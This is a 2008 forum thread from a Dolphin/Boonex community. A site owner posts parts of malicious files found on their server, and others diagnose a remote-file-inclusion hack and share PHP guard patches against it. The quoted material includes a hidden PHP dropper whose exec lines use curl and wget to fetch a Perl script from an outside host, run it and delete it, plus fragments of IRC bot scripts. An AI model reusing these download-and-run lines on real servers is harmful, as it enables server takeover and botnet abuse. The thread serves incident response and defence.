found txt files inside cache

I have discovered an insiderz folder inside cache with 3 txt files, namely "manado.txt", "rabot.txt" and "c.txt". I copied a portion of each file.

portion of manado:

<title>r@Crew</title>
<h2>PHPESSID546343569346834781478127128748375823758235782357823</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://adsforum168.com/cache/Insiderz/";
exec('cd /tmp;curl -O '.$url.'c.txt;perl c.txt;rm -f c.txt*;');
exec('cd /tmp;GET '.$url.'c.txt > c.txt;perl c.txt;rm -f c.txt*;');
exec('cd /tmp;wget '.$url.'c.txt;perl c.txt;rm -f c.txt*;');

 

portion of rabot:


# PIXEL ELITE RAQUERS POWER RANGERS BUBLEGUM
# desde 2001 ouvindo backstreet boys
#
#

my @nickname = ("Abdulrazak","Ackerman","Adams","Addison","Adelstein","Adibe","Adorno","Ahlers","Alavi","Alcorn","Alda","Yedidia");


my @realname  = ("Evils Coder");
my @WHO;


$ARGC=@ARGV;

if ($ARGC !=1) {
print "\n+ prendedor.pl v.1.7\n";
 print "+ by OneX\n";
 print "+ irc.racrew.us \#racrew\n";
  print "+ Usage: perl $0 (target)\n";
   print "+ Edit the source first!\n\n";
     exit(1);

 

portion of c.txt

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

my $processo = '[httpd]';
my $linas_max='4';
my $sleep='6';
my $cmd="[PHP-SHELL]";
my $id="http://www.liautism.com/components/efnet.txt?";
my @adms=("Insiderz","BYkER_BoYz","Rama","NuGeLo","AbanK","KaLeKeK","Anubias");
my @canais=("#Manado");
my @nickname = ("JokoL".int(rand(1000)));
my $nick = $nickname[rand scalar @nickname];

Are these original Dolphin folders? Should I delete those?

Quote · 14 Sep 2008

I also found a folder named asdafg inside cache with a file inside that I can't open, it's named something like YO'. Do I need to delete that too? My host provider said it "looks" like a phishing folder, that's why I want to confirm it first here in the community. I think you guys know better than my host support team.

Quote · 14 Sep 2008

Just wondering what Dolphin version you use? Where do you host? And have you added any additional security?


Also, have all your file permissions been checked and re-checked, as well as register_globals being off as Boonex requires? Some hosts do have it on.

Just trying to get a grasp for what and where you are at with this.

Certainly not originals. Almost looks like you got hit with an RFI, with the .txt extension you mention. Just compare anything in your directories to the original Dolphin download. If they are suspicious, back them up, then do away with them. The file structure of Dolphin is pretty obvious. But you never know. If you are new to Dolphin, take a moment for some backups, security hardening, and rid them files.

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
Quote · 14 Sep 2008

the last two look like IRC bots, probably used for DDoS attacks or some such thing (unless you also have lots of large files somewhere on your server in which case they're probably IRC XDCC servers).

Do you/your host have any virus scanning software on your server? Most up-to-date AVs would find these types of bots, I would imagine, although I'm not 100% sure on that.

You could just join Efnet and join the channel #Manado, private message any of the adms (@adms=("Insiderz","BYkER_BoYz","Rama","NuGeLo","AbanK","KaLeKeK","Anubias")) as they are the people with access and ask them to stop. I doubt that they would do anything except laugh at you, but they would at least know that you 'found' their bot.

Oh, and definitely remove the files IMO, they're almost certainly not part of Dolphin..

Quote · 14 Sep 2008

Thanks, it turned out I needed to delete those folders and files; gave me a hard time deleting though, LOL

Funny thing is, before I figured out how to delete them (you can't delete them using FTP), phishing hackers attacked my site,

changed the permissions and rearranged and deleted blocks and menus. sigh*

Quote · 14 Sep 2008

someone needs to apply my fix for this


add the following code to your ray/modules/global/inc/content.inc.php

add it at the top, above the first require_once command

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

so it looks like this :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

this stops any remote includes being used

next edit /plugins/safehtml/HTMLSax3.php and add this at the top, above the require_once

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

so it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

this stops remote access to your directories

as my dedicated server is under constant attack from hackers trying to access the server via Dolphin, I paid them to look at the issue and this is what they have added to kill any remote access attempts

Thanks Sammie, hope it will stop the badguys totally.

Quote · 16 Sep 2008

it will stop them, but your problem is your host is insecure

Yup, sad to find it out too late. I'm looking for a new secure host though...

Quote · 16 Sep 2008

A bit of a late addition to what Sammie suggested. Try this at the top of your content.inc.php file:


if (isset($_REQUEST['sIncPath'])) {
error_log("HACKING ATTEMPT. User with the IP of ".$_SERVER["REMOTE_ADDR"]." has attempted to hack us using ".$_SERVER["SCRIPT_FILENAME"]);
die ('Hacking attempt');
}

This will properly log the attempt, which file was used and the IP of the attacker, in Apache's error_log file. Makes it easier to track him later.

Quote · 12 Feb 2009
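The two guards posted earlier (the sIncPath check for content.inc.php and the dir check for HTMLSax3.php) and the logging addition above all do the same job: refuse any request that tries to supply, through the URL, a POST body or a cookie, the name of a variable the script later hands to require_once(). The following is an added example, not Dolphin's code and not Sammie's patch, that folds the three snippets into one function so a single list of protected names covers both files. The variable names sIncPath and dir come from the thread; the function names, the $aProtectedNames list and the log wording are my own.

```php
<?php
// Added example: a reusable guard for the register_globals remote-include
// pattern discussed in this thread. Not part of Dolphin. Paste it at the top
// of the affected file, above the first require_once, instead of the separate
// one-line checks.

// Request parameters that, with register_globals on, would overwrite the
// variables later fed to require_once(). Both names are from the thread;
// extend the list if other include paths in your copy are built from variables.
$aProtectedNames = array('sIncPath', 'dir');

/**
 * Return the entries of $aProtectedNames that appear as keys of $aRequest.
 * Kept free of globals so it can be exercised from the command line.
 */
function detectPathOverride(array $aRequest, array $aProtectedNames)
{
    $aHits = array();
    foreach ($aProtectedNames as $sName) {
        if (array_key_exists($sName, $aRequest)) {
            $aHits[] = $sName;
        }
    }
    return $aHits;
}

/**
 * Log and abort if the current request supplies any protected name.
 * $_REQUEST merges GET, POST and cookies, the same sources register_globals
 * reads from, so a cookie-borne override is caught as well as ?sIncPath=...
 */
function blockPathOverride(array $aProtectedNames)
{
    $aHits = detectPathOverride($_REQUEST, $aProtectedNames);
    if (count($aHits) == 0) {
        return;
    }
    $sIp     = isset($_SERVER['REMOTE_ADDR'])     ? $_SERVER['REMOTE_ADDR']     : 'unknown';
    $sScript = isset($_SERVER['SCRIPT_FILENAME']) ? $_SERVER['SCRIPT_FILENAME'] : 'unknown';

    // Log the parameter names but not their values: the value is attacker
    // controlled and could push newlines or a long URL into error_log.
    error_log(sprintf('HACKING ATTEMPT: %s supplied %s to %s',
        $sIp, implode(',', $aHits), $sScript));

    // 403 rather than a 200 with "Hacking attempt" in the body, so the status
    // code is visible in the access log too. Nothing has been output yet at
    // the top of the file, but check anyway.
    if (!headers_sent()) {
        header('HTTP/1.0 403 Forbidden');
    }
    die('Hacking attempt');
}

// Complementary check: the guard only matters because register_globals turns
// request parameters into variables. Leave a note in the log if the host
// still has it on, which is what the thread identifies as the real problem.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('register_globals is ON in php.ini; Boonex requires it off');
}

blockPathOverride($aProtectedNames);

// The file's normal include lines continue below this point, e.g.
// require_once($sIncPath . "xml.inc.php");
```

Calling detectPathOverride() with a hand-built array such as array('sIncPath' => 'http://example.invalid/x.txt') returns the offending name, which is a quick way to confirm the list is right before deploying. The guard is still a stop-gap: it only blocks names you listed, so turning register_globals off and building include paths from constants rather than variables remains the fix that closes the hole.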